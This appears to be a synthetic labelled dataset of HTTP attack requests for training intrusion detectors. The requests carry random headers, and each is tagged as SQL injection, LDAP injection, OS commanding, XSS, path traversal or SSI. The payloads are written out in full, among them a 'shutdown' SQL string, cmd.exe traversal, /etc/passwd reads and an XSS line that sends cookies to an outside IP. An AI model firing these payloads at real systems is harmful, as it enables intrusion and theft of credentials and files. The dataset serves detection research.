GET /yUUwSYTIz8Ly/oR4ta9-evalIIEQ33/4NKHPv1KSXJUQv_TT/rwGpkNF71.zXD.aspx?eacE8ei1ratd=amnoaNtpea&obgEScleaadus=f%3Do%5Cl%28yXeCmm&nol99eU4vtah93=gihRsF&s3hdrash=510253&naiuk=eprocessing-instructionhia%404cmdn+bt%3Bexece%2B&hvfcgldd=31J&rvsyadm=amb6n4E7pboaaot6Me&o7z4us0o=qsS&oigpces=i5AzqHTbM%409m&comphaoo6Leve=big+ta3se+5y4&Lheutyono=neoC22&bUoSWiB=pma&lmNrlhfet7=eT%27+or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++++%27aienez%27+%3D+%27&7gimkmijgV=bopt HTTP/1.0
Host: www.tbeteDsesa.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, deflate, identity, gzip;q=0.2, compress
Accept-Language: e-0isafr, 3gSd-Arpbps
Cache-Control: no-cache
Client-ip: 71.34.148.218
Cookie: seoeanHquean=18714
Cookie2: $Version="34"
Date: Sat, 19 Nov 05 21:06:54 GMT
ETag: "-PkzT_C75R64usx5m"
Expect: 100-continue
From: rmxetsnS@eaotitdn.com
If-Modified-Since: Sun, 31 Oct 04 22:31:48 UTC
If-Unmodified-Since: Sun, 26 Jul 09 14:35:29 UTC
If-Match: *
If-None-Match: "dM_3.aCDTIOrTRRFHb.v"
If-Range: *
Max-Forwards: 72
MIME-Version: 8.6
Pragma: eonhe=tltr
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: 2ahlAk eisydtns=lNj3t
Range: -983
Referer: /okrDYnp/lkaitp/iftri/Ers1/dknimoi.cfm
TE: trailers,deflate,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.0 (compatible; MSIE 2.9; WinNT; ajeanCn)
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 2.8 www.nsacE.png, 6.8 217.222.110.85
Transfer-Encoding: compress
Upgrade: qfe/8.0
Warning: 682 www.f0shh3eu.jpeg "tocdihgtUi" "Fri, 20 Feb 04 11:54:19 CET"
X-Forwarded-For: 140.231.93.34
X-Serial-Number: 2013029504
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49917
Start - Id: 41384
class: SqlInjection
POST /oMsysnsac/agG/ybaqDQpk8N/4r4iwdoe72ertDlr.cgi? HTTP/1.0
Content-Length: 166
Content-Language: e,bdr
Content-Encoding: compress
Content-Location: /iookrc/esm4eiro/as3t7fps/pltlos/alu2ehhd.jpeg
Content-MD5: YWVlYW10dHNpVHRhZWx0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 May 08 07:38:31 CET
Last-Modified: Thu, 15 Mar 07 04:03:16 GMT
Host: 110.0.161.178
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate;q=0.3
Accept-Language: *
Cache-Control: waT4b='zl'
Client-ip: 93.72.204.142
Cookie: ngtD=2YhR8R;esEeish=3c82I4.IL2iT;seaYhrMpzlna5r=3
Cookie2: $Version="30"
Date: Tue, 17 Feb 09 12:34:49 UTC
ETag: "8SIu.AFvTvU3KcHdVRD"
Expect: Nerh01=hehmt9
From: nfie@aaskkmo.com
If-Modified-Since: Thu, 06 Dec 07 02:24:43 UTC
If-Unmodified-Since: Mon, 05 Jan 09 05:49:38 GMT
If-Match: "BxRvptb0fj4ZWdG25NL"
If-None-Match: *
If-Range: *
Max-Forwards: 03
MIME-Version: 2.2
Pragma: osd='1k75ipmn'
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Digest algorithm=ahIeaoa
Range: -9924,02717-,6-82569
Referer: http://www.RmkC0u.st/rgttetw/stoud42/a6Lnkf5.css
TE: chunked;q=0.2
Trailer: Accept-Language
User-Agent: Mozilla/9.4 (X11; U; Open BSD i386 5.8; el-ol; rv:6.2.0) Gecko/14733275
UA-CPU: 68000
UA-Disp: 727,089,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1178x5140
Via: rhlswi/0.0 179.26.152.175
Transfer-Encoding: deflate
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Forwarded-For: 85.56.154.10
X-Serial-Number: 3067055271
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

Mheeempygavdhg=sbsrz4vsi&c6dh= :r&eeTeiebucsnaA=';  shutdown--&1ibFwnpadmrnnmT=n2noy6=h&halr=2784&AWQZH=bzP1@AD05&oieeyu5eLnh=0738&kaoncN=eeyeeNnyiacnsDethn

End - Id: 41384
Start - Id: 37165
class: LdapInjection
GET /aD@kBdYU6ot.VLOc4/sdriDafaa/JEjWIJ6/rostHae6ue9eswen5/gzuh0/aszkg/d7gbizden9erf/YdDlike0unionIF1di0o-L/emceEtbnsspti4i.jpg?trfhscoetaehai=%29+%28+%7C+++%280vr%3Dee*%29&hrotyir91lsyh=hIWXL_K&yoc=2874959&COM0=hQOcbx_vfdD HTTP/1.1
Host: 217.172.93.65:4
Connection: 5ht4oSnf
Accept: text/*;q=0.0
Accept-Charset: *
Accept-Encoding: compress;q=0.7, identity;q=0.9
Accept-Language: reahms-nfiismou, dae-dsaqp6r;q=0.0
Cache-Control: max-stale=460
Client-ip: 188.238.110.194
Cookie: odc=s;vc=h9_JiB7B;fcoDe=okthbesatdpijboea;ek13rlTotusinoT=8128768
Cookie2: $Version="45"
Date: Sun, 04 Apr 04 03:48:36 CET
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: 100-continue
From: leAt4Eeo@dfiwc.org
If-Modified-Since: Fri, 24 Jul 09 22:57:41 GMT
If-Unmodified-Since: Wed, 28 Jul 04 08:14:49 GMT
If-Match: *
If-None-Match: "D3YV@nqrLZimSBOdBtPb"
If-Range: Fri, 29 Oct 04 16:41:25 CET
Max-Forwards: 40
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic YXBvczpza05p
Range: 183458-,10781-99705
Referer: http://www.goo4.st/ipnuor.shtml
TE: trailers
Trailer: Via
User-Agent: Mozilla/3.7 (Windows; U; Win98 4.4; bs-oC; rv:3.5.9) Gecko/51379380
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5776x2501
Via: 1.4 www.Eetgej.png, 8.5 100.100.233.3:6541, 0.5 www.lhes1.js
Transfer-Encoding: rsannr; Ttaq=o0shies
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 6743183535814854929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37165
Start - Id: 38601
class: LdapInjection
GET /o.bOmLbLug7cSu/FNAtxpsUBBZ/totmvepcndeee/e1/meswes2hb0dscehpmeh/njtrcdle.gif?hasn=in9ennniaols&acteijw0hdh=oefs&egynngttsuAtlb=9o%29%28%7C++%28lr%3D*%29&84Ereplace=phoO9lAhz&ejhQ4iAly=ide HTTP/1.0
Host: www.Dte7ilwr.net
Connection: close
Accept: application/x-tar;q=0.2, video/quicktime
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.9, identity;q=0.5, gzip, identity;q=0.2, deflate
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 47.85.156.197
Cookie: isfb=541078
Cookie2: $Version="7"
Date: Thu, 13 May 04 19:33:11 UTC
ETag: W/"1BC0q5Z63GcBA0j"
Expect: trilhrm
From: Henr0sl4@nexht.fr
If-Modified-Since: Thu, 12 Mar 09 08:15:52 UTC
If-Unmodified-Since: Mon, 24 May 04 23:58:04 UTC
If-Match: "bV571v-3Ly.hYO5fI5eK"
If-None-Match: "N4IiCKMLXmw-kUZ4Vv"
If-Range: Sat, 25 Jun 05 18:21:41 CET
Max-Forwards: 982
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic dHQwaXJhZTpEcmVh
Authorization: NTLM YWRiZW9EaHB1cUN6cmdkbDdpdHJuY250NG9haGVkOXFkSWV3bmNlTnU1ZQ==
Range: -348176
Referer: /3usplcdi.pdf
TE: gzip;q=0.5,deflate,trailers
Trailer: Range
User-Agent: zqdOisleig/4.9.6
UA-CPU: Sparc
UA-Disp: 7529,000,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 623x8485
Via: 2.7 131.55.247.223, 6nykL/0.4 www.g4dEeth.tiff, o7hen/8.6 65.41.39.205
Transfer-Encoding: identity
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 548 www.Aup9tn.css "jido14iihrlea" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38601
Start - Id: 42971
class: OsCommanding
GET /sdG/nGLOeJ6/sSDi/lAEX9iWcBoj3/nsPwVS39fzmtNk4/5nt/elZmI/r9SVadminIp-0Uw/5Fe05bWEo.Og/zNeOyetAa/er25Clj8.msf?t0dsat881Qde=4&WwHFandG0Hw=copygh&eiam=0%28e+%3Dsichildtaedrcp95y7bTA&3maoto=eyhdh&IUxterm2JYZ2.J=aleneh3c1&tgsi2orMV3=tCgE1E&udOg=A&fitwhlott=0&tptat7teeitcod=esit&notae=43468977&ernhkdrzyEfo=ag%2B1 HTTP/1.1
Host: 123.247.72.67
Connection: keep-alive
Accept: text/*;q=0.5, image/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: qo-iylne3jt;q=0.7, A-eg, z0bymton-ndmooda;q=0.5, gN-ceagWme, r-wOta
Cache-Control: max-age=271
Client-ip: 77.247.172.242
Cookie: ee=515221;olcasgwek39an=73;catzoEw=hheerwiexk7ctEooen;matrgaes=%2Fbin%2Fps%2500+++%7C;%ucbetween6nrKa=oar4
Cookie2: $Version="72"
Date: Tue, 11 Oct 05 21:14:55 UTC
ETag: "r7Hapr3GiPAntNlzNv"
Expect: 100-continue
From: ajo2eno@Il3E87.biz
If-Modified-Since: Sun, 07 Aug 05 01:01:43 UTC
If-Unmodified-Since: Thu, 08 Dec 05 17:51:56 GMT
If-Match: "1IHT1N9bRUeKEUH-_"
If-None-Match: "BPSC.0qPUAmty7Tpr"
If-Range: Wed, 11 Apr 07 17:29:41 CET
Max-Forwards: 9
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic aWl3dDp5aWNidHQ=
Authorization: 3uhnad rahrne=3torltij
Range: 015-2505
Referer: http://www.9eeei6.cz/lotld/nadopie/neyah/simeYczu.sh
TE: trailers
Trailer: Upgrade
User-Agent: tnmelatEa (oOqqsqAI4r; hUHTcRKOQ; lnRNe1F6A; 22jLDkNdi; rsJjb@2zg)
UA-CPU: StrongARM
UA-Disp: 9659,2069,32
UA-OS: Win98
UA-Color: color16
Via: HTTP/4.5 www.ssmE.png:2054
Transfer-Encoding: identity
Upgrade: 6tes/6.0, eset/0.0
Warning: 430 www.ooy4teh.gif "nn6ltSh" "Wed, 15 Nov 06 17:03:14 GMT"
X-Forwarded-For: 5.63.56.150
X-Serial-Number: 481448
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42971
Start - Id: 37275
class: LdapInjection
PUT /e6Fha_AtdiBbpB/0hcilleecrtogod0sh/oau4capfist/tasul9rjf6mn/JbK80K/oMszz31HJ5HA_L1kxK1c/QpmwIK_mnvY_5Mq/nn1tE0n8IH744/8IiBstyle1@tf7Cf.mspx? HTTP/1.1
Content-Length: 231
Content-Language: au,jT3rIwN,tctbvN
Content-Encoding: compress
Content-Location: /eeo1dGs/t3xs.jpg
Content-MD5: aTZldHRkc3N4d3l5d2Vjcg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Oct 08 20:43:20 CET
Last-Modified: Sat, 23 Jan 10 12:18:42 CET
Host: www.ehsueeaAp.biz:13431
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.3, identity;q=0.3, gzip;q=0.1
Accept-Language: 64)(&(objectClass=aOu)(|(sn =    cmej)(cn=gdg     J*))
Cache-Control: no-store
Client-ip: 110.248.121.211
Cookie: hki2TOhAhr=D\copy;kXg3gWJeHLXX=6180691;teaehamstlharv=Nexec<nn]h3ar winntwmail
Cookie2: $Version="96"
Date: Thu, 09 Apr 09 17:33:24 CET
ETag: W/"1C2fRvfJK-NNMW9W"
Expect: uecft0
From: us0iolso@onRdui.com
If-Modified-Since: Sun, 04 Dec 05 05:17:48 CET
If-Unmodified-Since: Fri, 14 Nov 08 18:11:48 GMT
If-Match: "BOqwqakaq5e7dNe5mQQ"
If-None-Match: *
If-Range: "nqEKVgfz1Z_yC2a"
Max-Forwards: 4
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM bjlyaTdodGlzZTV1ZWxOdHJ1ZDZ4dTRucjM2bnNpd2xnb3RWZWVyZ21hbnQx
Authorization: Basic bmVhZzppYW5zdw==
Range: -3,40874-059856,-5
Referer: /ebtos/rese/tniatmlp/feeT/meb6lg9d.pl
Trailer: TE
User-Agent: Mozilla/4.6 (X11; U; Linux i386 8.8; nN-ue; rv:4.5.0) Gecko/16008845
UA-Color: color8
Via: FTP/5.0 216.60.151.133, FTP/3.3 www.lnuetg.jpeg
Transfer-Encoding: compress
X-Serial-Number: 14226
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tYPUVmeta0F=riOd'outeh6me&bnqyhast=9&nMhsd7n=s-_GL&p3iQwgetbgsound67F=yjobyIMz&wDaQiOmo=fhrKpr&rinharlE2=3&tnhEaiHzc3rie=194&O043gPKbW@=2217145&xhan=ww s&hr=2520602&lwoegehLp1N=lsR0aij@re2ndocumentdnTB+me&nca=rieVeaph7t8tsTmr

End - Id: 37275
Start - Id: 47315
class: XSS
GET /gU/amn4eothrtns8/KyservicesgF8aI.Ksock_streami.shtml?h0oAe1ni=%3Cstyle+++type%3D%22++++text%2Fjavascript%22%3E%5Bwindow.open%28%27http%3A%2F%2F17.204.232.49%2Fraor.msf%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle+++%3E&R4Deoneeaat0=ylspItsh6h HTTP/1.1
Host: 230.90.45.237
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.6, deflate, gzip
Accept-Language: vl-epi
Cache-Control: max-stale=18078
Client-ip: 107.154.88.110
Cookie: octrfEElophoih=670;inziylo=uEiN;letsej6eee=2Navebe;ttqeed=cscripteinclude nodeb3qb;n3teORtfliw1=mNsa7T0;e$ei;5qnHiwnrtd=944184
Cookie2: $Version="508"
Date: Thu, 22 Mar 07 08:05:06 UTC
ETag: W/"tViHpc6x1H6fcLzNQ"
Expect: 100-continue
From: ntsn@eneotga.ch
If-Modified-Since: Thu, 26 Feb 09 07:36:01 GMT
If-Unmodified-Since: Mon, 20 Mar 06 19:44:53 GMT
If-Match: "oR8LLbKoOAnYARp"
If-None-Match: *
If-Range: *
Max-Forwards: 996
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: NTLM dGV1dXZhQWF3OWVldFk2dG5ocmFtMGkwdGdoZGNhZXRIdE90bWl3dW9vYWU=
Range: 498-
Referer: /dno8w/el5aaO/gmeadstS/srdhFtbe.fgf
TE: chunked
Trailer: Accept-Encoding
User-Agent: tqG.ucqkfu http://www.enu5e.cz
UA-CPU: Sparc
UA-Disp: 8442,560,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: 1.0 152.125.245.225
Transfer-Encoding: identity
Upgrade: ddnzgk/3.0, pnnt/9.2, eehf/9.2
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 18.209.187.11
X-Serial-Number: 126620
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47315
Start - Id: 36560
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 219.206.68.76
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-5;q=0.7, euc-kr;q=0.0, cp-950;q=0.5, iso-8859-8-i
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=17
Client-ip: 197.131.59.208
Cookie: j6WQKtdR=d_B7U;madsn=lrRnszyaaS9'i;fnwt0=53888
Cookie2: $Version="25"
Date: Tue, 04 Nov 08 14:36:30 CET
ETag: "._sHr99T4AKY.QbUteoU"
Expect: e2h0
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Sun, 21 Sep 08 16:41:50 GMT
If-Unmodified-Since: Sat, 22 Dec 07 17:03:41 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 9.7
Pragma: Q='faaoepns'
Proxy-Authorization: 4eitC tieta=unrJ6ewe
Authorization: NTLM bmdpdWx0bGdlZ3R3bzlzc0Vsb2Vhd3E0dXNvZ3dpdWhvZ2F1b3hlYnBTdmk0aTU=
Range: -7292
Referer: http://amai.biz/tl8h6mmm.zip
TE: deflate
Trailer: If-Match
User-Agent: Mozilla/1.2 (compatible; setoe; Linux i386; 9L5aoataaz; oqpaEywspr)
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 547x5195
Via: enogs/8.6 www.tetqra.jpg:2, 3.7 196.40.24.71, 6.1 www.2pocs.jpeg
Transfer-Encoding: gzip
Upgrade: iOe8/3.1
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36560
Start - Id: 42634
class: SqlInjection
GET /4G0OG_LqT8C/lO-MlJqWKH_U0uwSe/ae/ta0e6evpiersN/gSfO9nFNNDbrL4MHRSOQ/r8jTK_dVuOTFW06ud/oQuUTzX/aHI-yXUhTQjb67NaP/e1@dA3b/LiahOuse.dll?lsn6ey06faq=or+++++0%3C%3E%28select+++count%28*%29+from+++++7o%29&uwuxtyEl0ssb=m.-KNcM HTTP/1.0
Host: 170.127.114.221
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: cp-932;q=0.1, gb2312;q=0.4, x-mac-ce
Accept-Encoding: *;q=0.7
Accept-Language: 8-8hcuwcs, aeuss0-ne9oi, ailn-hzLE;q=0.6
Cache-Control: min-fresh=17675
Client-ip: 107.228.29.96
Cookie: r02s=tDb@;ib5sdms8srser=linDuy ntaccept ;JBIy=nae;dm6=1
Cookie2: $Version="596"
Date: Thu, 24 Feb 05 20:55:38 GMT
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: gotca@lpobi9rhDa.org
If-Modified-Since: Sun, 26 Oct 08 07:47:23 GMT
If-Unmodified-Since: Mon, 09 Aug 04 22:26:17 GMT
If-Match: "GDnsZ-T4oXz66QlP"
If-None-Match: *
If-Range: Sat, 19 Nov 05 17:56:43 CET
Max-Forwards: 1
MIME-Version: 3.2
Pragma: o='pgm'
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: NTLM OTFveGhqbGFlMHRvb2FkaXJPY3NxOG1zdGFmM3Rzam5SdmU=
Range: 72326-9838
Referer: /ci2aoieo.tiff
TE: chunked;q=0.3,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.3 (X11; U; Open BSD i386 2.8; rm-ne; rv:7.8.8) Gecko/66378772
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4720x346
Via: 6.1 243.57.154.98
Transfer-Encoding: compress
Upgrade: rBa/4.9
Warning: 162 www.tgbma.css:1 "eWemetp9erNow3n" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42634
Start - Id: 45848
class: PathTransversal
GET /traac61qs0q/sa.4h5RC_p21kAjoAqgW/onnocsogsv.jsp?nodeWwhGll@DfN=ojLS8&8mlernUw=hkec9dan28feRdr&lsSR=euKI8D7&seo35cQoaua86=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&hno=54709&nntegeo0A=24118187&id_L2=eqdl&iznloE=dr6mWz7V9VP&MrtqT2upl=81&Ou6f3rc=iframeeTi9%40e9&4d9qoenMn7=rKa%3D%3Auza&eedt=26783&BwTsI=280003&ln6Ng=2233 HTTP/1.1
Host: 224.144.15.147
Connection: close
Accept: text/plain;q=0.2, audio/basic, application/x-tar
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: rr=hoiGsht
Client-ip: 145.76.47.201
Cookie: eolrs=tiad eeascript'Gai2htpass-dnt;Ohdwceen=620;w6noee8hl4wN=r
Cookie2: $Version="59"
Date: Wed, 24 Feb 10 10:17:27 GMT
ETag: W/"aJyevn6vEVafqY5vIsv4"
Expect: iiLhe
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Thu, 15 Nov 07 23:55:37 CET
If-Unmodified-Since: Tue, 24 Jan 06 10:56:52 UTC
If-Match: "wCKfAVscJRiyLtAZJk."
If-None-Match: "dOSpM7@hAs4J7L56Pi"
If-Range: *
Max-Forwards: 16
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: oslnau lehthen=tauTbq
Range: 505894-77
Referer: /29afpre5.exe
TE: deflate,chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.4 (compatible; yaiw7i; SunOS sun4u; DahA; rrtsfacec; 6pneec)
UA-CPU: Sparc
UA-Disp: 011,2094,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8255x255
Via: 8irhe/2.0 209.35.243.27:6, sbun/9.0 www.Rcryaeym.css:11
Transfer-Encoding: compress
Upgrade: nx6d/2.5, grzln/9.5
Warning: 146 143.244.193.232 "tjezxosaoyuieeityv" 
X-Forwarded-For: 239.104.254.12
X-Serial-Number: 25397478987579
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45848
Start - Id: 41267
class: SqlInjection
GET /mrdSth/-boOxTNJaFxBafk/kR.RZ0t@bk/mYgQkbZM/phZmsdV/gZ2vGokvH_X5oiBR/77yI1T@VW5zgZJ/ysrp76b/t6KtQoImF.jsp? HTTP/1.1
Host: www.yecr.be
Connection: keep-alive
Accept: text/*;q=0.3, video/*;q=0.8, audio/x-wav;q=0.4
Accept-Charset: euc-kr, x-mac-korean;q=0.1, x-mac-arabic;q=0.0
Accept-Encoding: 
Accept-Language: e-A9wtx
Cache-Control: max-age=7
Client-ip: 129.234.186.132
Cookie: Faszush=OR 98=98
Cookie2: $Version="7"
Date: Thu, 09 Dec 04 20:51:38 UTC
ETag: "DxfWlx@4Kurs7MW"
Expect: oehsmNbr=td4gOaz
From: secaxaii@ljoAtaiiwf.de
If-Modified-Since: Sun, 06 Jun 04 08:18:08 CET
If-Unmodified-Since: Sun, 31 Oct 04 13:12:27 UTC
If-Match: "DpgAN5_PN7SnpqQZ"
If-None-Match: "0Yy_Z9Kp2XQ_spfIY3i"
If-Range: "-bGQRFcu8Dkvyqp"
Max-Forwards: 1939
MIME-Version: 2.4
Pragma: z=p
Proxy-Authorization: Digest cnonce="4dmgm"
Authorization: ikXotk aaaOpnnF=8oe99c2
Range: -78675,-73,41-
Referer: /luHtwing.jpeg
TE: trailers
Trailer: Max-Forwards
User-Agent: jeendWis
UA-OS: Win9x
UA-Pixels: 557x1445
Via: 1.2 154.71.44.182:5442
Transfer-Encoding: identity
Upgrade: iyhnr/0.0, awhact/3.4, e1delp/1.8, 3goK/3.2, deeso/8.6
Warning: 292 236.224.211.136 "whsgbaeh2iSTibeIwt" "Tue, 02 Sep 08 21:32:22 GMT"
X-Forwarded-For: 31.90.227.178
X-Serial-Number: 2028120
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41267
Start - Id: 43680
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.1
Host: www.ouuiuafw.biz
Connection: close
Accept: image/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 10.124.19.16
Cookie: ailOuotew=b<styleda;objectr2Xmzmimgj=uhewep =1\hdas
Cookie2: $Version="617"
Date: Fri, 30 Jun 06 17:29:03 UTC
ETag: W/"S1TaRMTQKjjb-G6@X"
Expect: mhknea
From: o68nO@tetn70i.cz
If-Modified-Since: Wed, 27 Feb 08 19:17:13 UTC
If-Unmodified-Since: Sat, 21 Apr 07 01:00:44 UTC
If-Match: *
If-None-Match: "6FUvDFJhYCwcMuLU"
If-Range: Sun, 05 Dec 04 01:14:29 GMT
Max-Forwards: 2
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="lieew"
Authorization: Digest algorithm=MD5
Range: 42-91,822939-,-31
Referer: /swaq/hber7er/mabhh/prptTRer.cfm
TE: trailers,chunked
User-Agent: Mozilla/4.0 (Windows; U; Win98 3.4; mn-mb; rv:8.8.7) Gecko/17635417
UA-CPU: PowerPC
UA-Disp: 0760,6921,16
UA-Color: color16
UA-Pixels: 827x275
Via: FTP/5.1 187.32.105.226, tnlss/5.5 70.23.82.162
Transfer-Encoding: deflate
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 84513190969177426
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43680
Start - Id: 36318
class: PathTransversal
GET /Eetpcifaogggi/ceS46pzYm0tiUc/eyw70HdL2d69/z0wXfwGlinkRcPyb/Cpcmdl/Heoeixhsp/f79cH7/DZ/gkpGhqiRagADoOV-/kgS2d4hRQI2.gif?csdoapaerahae=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.1
Host: 212.176.61.227
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: mfno8-nuhonr;q=0.6, 2tpto2r-onahptc;q=0.2
Cache-Control: min-fresh=0
Client-ip: 204.44.253.203
Cookie: snsu3ieles4i=086;ylhna7pri=erh-yUqaxVzQ
Cookie2: $Version="628"
Date: Tue, 02 May 06 15:33:35 CET
ETag: W/"XVnSSkhMGncEq258"
Expect: 4soo
From: 5ygo@eiccrasaq.org
If-Modified-Since: Wed, 02 Apr 08 12:47:33 CET
If-Unmodified-Since: Sun, 13 Feb 05 11:42:06 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 48
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic aTFhdGw6bmFhc0ZIZWE=
Authorization: Basic dVNhZWNjczp0bW1laHllbA==
Range: -399013
Referer: /ieyseoeu/eteyose/tlh9ti/tFneemd.sh
TE: trailers,deflate;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/4.2 (compatible; Konqueror/2.0; Open BSD i386; m5tmeto)
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 645x5981
Via: FTP/5.8 58.143.76.214, 0.1 www.w4aqilad.html, 5.6 www.9se0.gif
Transfer-Encoding: identity
Upgrade: cdl/2.8, oueiab/2.3, nfnoc/8.1
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 10989646571343616
----: ----------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36318
Start - Id: 39349
class: SSI
GET /n6LWbV8AcOt/iknep/tflehsaiysLhs/9M5iA9Nwco2R7mog.jpeg?hqnnc1y5s=38&hmtu26roloinr=%7Eo+%24&85.dCunionftP=soihnode9&QnDM=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&Gdnwe=5arm%25opendlscriptiframestm HTTP/1.0
Host: 215.225.147.143
Connection: eaeye2e
Accept: video/*, application/*;q=0.2, text/*;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.1
Accept-Language: GnrahtlO-khh5ee;q=0.7, c1etih-8e, l57eelm-don, senaNn-gp;q=0.7, Dnn-nS;q=0.6
Cache-Control: only-if-cached
Client-ip: 199.161.172.175
